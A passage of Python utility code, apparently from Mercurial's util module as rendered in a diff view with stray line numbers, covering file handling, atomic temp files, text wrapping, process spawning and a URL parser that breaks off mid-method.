            or altsep and path.endswith(altsep))
1847
1856
def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if need.'''
    sep = pycompat.ossep
    return path.split(sep)
1855
1864
def gui():
    '''Are we running in a GUI?'''
    if not pycompat.isdarwin:
        return pycompat.iswindows or encoding.environ.get("DISPLAY")
    # macOS: distinguish local (GUI) sessions from remote ones
    if 'SSH_CONNECTION' in encoding.environ:
        # handle SSH access to a box where the user is logged in
        return False
    if getattr(osutil, 'isgui', None):
        # check if a CoreGraphics session is available
        return osutil.isgui()
    # pure build; use a safe default
    return True
1870
1879
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    dirname, basename = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % basename, suffix='~',
                                dir=dirname)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            # a missing source simply yields the (empty) temp file
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        # don't leave a half-written temp file behind
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
1911
1920
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build a filestat for path; a missing file yields stat=None."""
        try:
            st = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            st = None
        return cls(st)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from an already-open file object."""
        return cls(os.fstat(fp.fileno()))

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat.st_ctime == old.stat.st_ctime and
                    self.stat.st_mtime == old.stat.st_mtime)
        except AttributeError:
            pass
        # at least one side has no stat: equal only if both are missing
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        Two stats are "ambiguous" when their ctimes are equal: the file
        may have been changed twice (or more) within the same second,
        in which case the size/ctime/mtime comparison of __eq__ cannot
        reliably detect the change.

        All equal-ctime cases are treated as ambiguous regardless of
        mtime, because an mtime that advanced naturally can collide
        with one that was advanced artificially by a previous
        avoidambig() call.

        Callers resolve the ambiguity by advancing mtime 1 sec when
        this returns True, ensuring S[n-1].mtime != S[n].mtime even if
        the file size is unchanged.
        """
        try:
            return (self.stat.st_ctime == old.stat.st_ctime)
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        advanced = (old.stat.st_mtime + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other
2013
2022
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegate I/O methods straight to the underlying file object
        for attr in ('read', 'write', 'seek', 'tell', 'fileno'):
            setattr(self, attr, getattr(self._fp, attr))

    def close(self):
        # a second close() is a no-op
        if self._fp.closed:
            return
        self._fp.close()
        filename = localpath(self.__name)
        oldstat = self._checkambig and filestat.frompath(filename)
        if not (oldstat and oldstat.stat):
            rename(self._tempname, filename)
            return
        rename(self._tempname, filename)
        newstat = filestat.frompath(filename)
        if newstat.isambig(oldstat):
            # stat of changed file is ambiguous to original one;
            # advance mtime 1 sec to disambiguate
            advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
            os.utime(filename, (advanced, advanced))

    def discard(self):
        if self._fp.closed:
            return
        try:
            os.unlink(self._tempname)
        except OSError:
            pass
        self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on clean exit, throw the temp copy away on error
        if exctype is not None:
            self.discard()
        else:
            self.close()
2076
2085
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    (tryunlink if ignoremissing else unlink)(f)
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
2088
2097
def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as err:
        # a missing file is fine; anything else is a real failure
        if err.errno != errno.ENOENT:
            raise
2096
2105
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # reached the filesystem root without success
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)
2124
2133
def readfile(path):
    """Return the entire binary contents of the file at path."""
    fp = open(path, 'rb')
    try:
        return fp.read()
    finally:
        fp.close()
2128
2137
def writefile(path, text):
    """Replace the contents of the file at path with text (bytes)."""
    fp = open(path, 'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
2132
2141
def appendfile(path, text):
    """Append text (bytes) to the file at path, creating it if absent."""
    fp = open(path, 'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
2136
2145
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # Re-chunk anything over 1MB into 256k pieces so read()
            # never holds a huge string just to slice a little off it.
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2**18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        remaining = l
        pieces = []
        queue = self._queue
        while remaining > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # Peek instead of popleft/appendleft: for partial reads we
            # track an offset into the head chunk rather than re-slicing
            # and re-queueing it, which would cost 2 deque mutations and
            # a new string per partial read.
            chunk = queue[0]
            chunklen = len(chunk)
            offset = self._chunkoffset

            # Consume the whole head chunk untouched.
            if offset == 0 and remaining >= chunklen:
                remaining -= chunklen
                queue.popleft()
                pieces.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            unread = chunklen - offset

            # Consume everything left in the head chunk.
            if remaining >= unread:
                remaining -= unread
                queue.popleft()
                # offset == 0 is handled by the block above, so this
                # slice is never merely a full copy via ``chunk[0:]``.
                pieces.append(chunk[offset:])
                self._chunkoffset = 0

            # Take only part of the head chunk; remember how far we got.
            else:
                pieces.append(chunk[offset:offset + remaining])
                self._chunkoffset += remaining
                remaining -= unread

        return ''.join(pieces)
2216
2225
def filechunkiter(f, size=131072, limit=None):
    """Yield the contents of ``f`` in chunks of up to ``size`` bytes.

    At most ``limit`` bytes total are produced when ``limit`` is given;
    otherwise the whole file is read (default size is 131072). A chunk may
    be shorter than ``size`` at end of file, or when the underlying file is
    a socket or some other type of file that sometimes reads less data than
    is requested.
    """
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        nbytes = size if limit is None else min(limit, size)
        # a zero-byte request means the limit is exhausted; short-circuit
        # so we never issue a read(0) against the file
        data = nbytes and f.read(nbytes)
        if not data:
            break
        if limit:
            limit -= len(data)
        yield data
2237
2246
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        remaining = self._left
        if not remaining:
            # cap exhausted: report EOF regardless of the source's state
            return b''

        # a negative count means "read everything still allowed"
        want = remaining if n < 0 else min(n, remaining)
        data = self._fh.read(want)
        self._left = remaining - len(data)
        assert self._left >= 0

        return data
2266
2275
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        # flag computation cannot raise; only compile() needs the guard
        flags = 0 if casesensitive else remod.I
        try:
            regex = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search

    if pattern.startswith('literal:'):
        pattern = pattern[8:]

    if casesensitive:
        match = pattern.__eq__
    else:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match
2325
2334
def shortuser(user):
    """Return a short representation of a user name or email address."""
    # drop the domain of an email address, if any
    idx = user.find('@')
    if idx >= 0:
        user = user[:idx]
    # "Real Name <login" -> "login"
    idx = user.find('<')
    if idx >= 0:
        user = user[idx + 1:]
    # keep only the first word, then only the part before the first dot
    for sep in (' ', '.'):
        idx = user.find(sep)
        if idx >= 0:
            user = user[:idx]
    return user
2341
2350
def emailuser(user):
    """Return the user portion of an email address."""
    # cut at the first '@' (everything before it), then drop any
    # "Real Name <" prefix (everything after the first '<')
    user = user.split('@', 1)[0]
    return user.split('<', 1)[-1]
2351
2360
def email(author):
    '''get email of author.'''
    # take the text between '<' and '>'; when there is no '<' the slice
    # starts at 0 (find returns -1, +1 == 0) and degrades to the whole
    # string, and a missing '>' means "to end of string"
    end = author.find('>')
    if end < 0:
        end = None
    start = author.find('<') + 1
    return author[start:end]
2358
2367
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    # delegates column-aware (multi-byte safe) trimming to encoding.trim,
    # appending '...' when truncation happens
    return encoding.trim(text, maxlength, ellipsis='...')
2362
2371
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity

    unittable is a sequence of (multiplier, divisor, format) triples, tried
    in order; the first entry whose threshold (divisor * multiplier) the
    absolute count reaches is used. The last entry is the fallback.
    '''
    def render(count):
        magnitude = abs(count)
        for multiplier, divisor, fmt in unittable:
            if magnitude >= divisor * multiplier:
                return fmt % (count / float(divisor))
        # nothing matched: format with the final (smallest-unit) entry
        return unittable[-1][2] % count

    return render
2373
2382
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
    ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
    ...
    ParseError: fromline must be strictly positive
    """
    # fromline > toline is an empty/negative range; reject it
    if fromline > toline:
        raise error.ParseError(_("line range must be positive"))
    # line numbers are 1-based on input
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline
2394
2403
# byte-count formatter: picks the coarsest unit (GB down to plain bytes)
# that still shows roughly three significant digits
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2407
2416
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    # collapse each CR*LF sequence into a single LF
    return _eolre.sub('\n', s)

def tocrlf(s):
    # collapse each CR*LF sequence into a single CRLF
    return _eolre.sub('\r\n', s)

# Alias the conversion matching this platform's native line ending, so
# tonativeeol/fromnativeeol are identity (no-op) on LF platforms.
if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
2425
2434
def escapestr(s):
    """Return s with non-printable bytes rendered as backslash escapes.

    Calls the codec function underlying Python 2's
    s.encode('string_escape') directly, for Python 3 compatibility.
    """
    escaped, _length = codecs.escape_encode(s)
    return escaped
2430
2439
def unescapestr(s):
    """Interpret backslash escapes in s (inverse of escapestr)."""
    decoded, _length = codecs.escape_decode(s)
    return decoded
2433
2442
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        return pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy
        return pycompat.bytestr(encoding.strtolocal(str(obj)))
2442
2451
def uirepr(s):
    """Return a repr() of s suitable for presenting to the user."""
    # Avoid double backslash in Windows path repr()
    return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2446
2455
# delay import of textwrap
def MBTextWrapper(**kwargs):
    """Build a width-aware text wrapper.

    On first call this defines the wrapper class, rebinds the module-level
    name ``MBTextWrapper`` to that class (via the ``global`` below), and
    returns an instance; later calls hit the class directly.
    """
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires use decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # split ucstr at the largest prefix whose display width fits in
            # space_left columns
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chucks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    # cache the class by replacing this factory function at module level;
    # subsequent MBTextWrapper(**kw) calls construct instances directly
    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2550
2559
def wrap(line, width, initindent='', hangindent=''):
    """Word-wrap a byte string to at most width display columns.

    initindent prefixes the first output line, hangindent all later
    lines. Returns a byte string in the local encoding.
    """
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    # MBTextWrapper operates on unicode; decode inputs once using the
    # local encoding and its error-handling mode
    enc = pycompat.sysstr(encoding.encoding)
    mode = pycompat.sysstr(encoding.encodingmode)
    uline = line.decode(enc, mode)
    uinit = initindent.decode(enc, mode)
    uhang = hangindent.decode(enc, mode)
    wrapper = MBTextWrapper(width=width,
                            initial_indent=uinit,
                            subsequent_indent=uhang)
    return wrapper.fill(uline).encode(enc)
2566
2575
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #            | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    # --------------------------------------------------
    # fp.__iter__ | buggy   | buggy           | okay
    # fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            # read raw bytes via os.read (EINTR-safe with the retry below)
            # and reassemble them into lines
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            # trailing partial line: keep for next read
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        """Return an iterator of lines over fp that is safe against EINTR."""
        fastpath = True
        if type(fp) is file:
            # regular on-disk files do not hit the EINTR bug; use the much
            # faster native fp.__iter__ readahead
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
2638
2647
def iterlines(iterator):
    """Yield each line of every text chunk produced by iterator."""
    for data in iterator:
        lines = data.splitlines()
        for currentline in lines:
            yield currentline
2643
2652
def expandpath(path):
    """Expand environment variables, then ~user constructs, in path."""
    expanded = os.path.expandvars(path)
    return os.path.expanduser(expanded)
2646
2655
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if not mainfrozen():
        return gethgcmd()
    if getattr(sys, 'frozen', None) == 'macosx_app':
        # Env variable set by py2app
        return [encoding.environ['EXECUTABLEPATH']]
    return [pycompat.sysexecutable]
2661
2670
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # os.wait() returns a (pid, status) tuple, which is what gets
        # stored in the set
        terminated.add(os.wait())
    prevhandler = None
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # NOTE(review): ``pid in terminated`` tests an int against a set
            # of (pid, status) tuples, so it looks like it can never match;
            # testpid(pid) appears to be the effective liveness check here —
            # confirm before relying on the terminated-set path.
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # restore the previous SIGCHLD disposition
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)
2696
2705
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.

    The caller's mapping is never modified.
    """
    fn = fn or (lambda s: s)
    # All values are bytes here; use explicit byte literals so the join is
    # consistent with the bytes regex built below (identical on Python 2).
    patterns = b'|'.join(mapping.keys())
    if escape_prefix:
        patterns += b'|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # Work on a copy so the synthetic prefix -> prefix entry does not
        # leak into the caller's dict.
        mapping = dict(mapping)
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2721
2730
def getport(port):
    """Resolve a network service specification to a numeric port.

    Integers (and strings holding integers) are converted and returned
    directly; anything else is treated as a service name and resolved
    with socket.getservbyname(). An unknown service raises error.Abort.
    """
    try:
        return int(port)
    except ValueError:
        # Not numeric -- fall through to a service-name lookup.
        try:
            return socket.getservbyname(pycompat.sysstr(port))
        except socket.error:
            raise Abort(
                _("no port number associated with service '%s'") % port)
2738
2747
# Recognized spellings of boolean config values, all lowercase.
_booleans = {
    '1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
    '0': False, 'no': False, 'false': False, 'off': False, 'never': False,
}

def parsebool(s):
    """Interpret s as a boolean value.

    Returns None when s is not a recognized boolean spelling.
    """
    return _booleans.get(s.lower())
2749
2758
2750 _hextochr = dict((a + b, chr(int(a + b, 16)))
2759 _hextochr = dict((a + b, chr(int(a + b, 16)))
2751 for a in string.hexdigits for b in string.hexdigits)
2760 for a in string.hexdigits for b in string.hexdigits)
2752
2761
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # Characters left unquoted when re-assembling user/passwd/host.
    _safechars = "!~*'()+"
    # Path and fragment additionally keep '/', ':' and backslash unquoted.
    _safepchars = "/!~*'()+:\\"
    # Matches a leading 'scheme:' prefix (RFC 2396 scheme characters).
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                # No scheme: the whole remaining string is a local path.
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
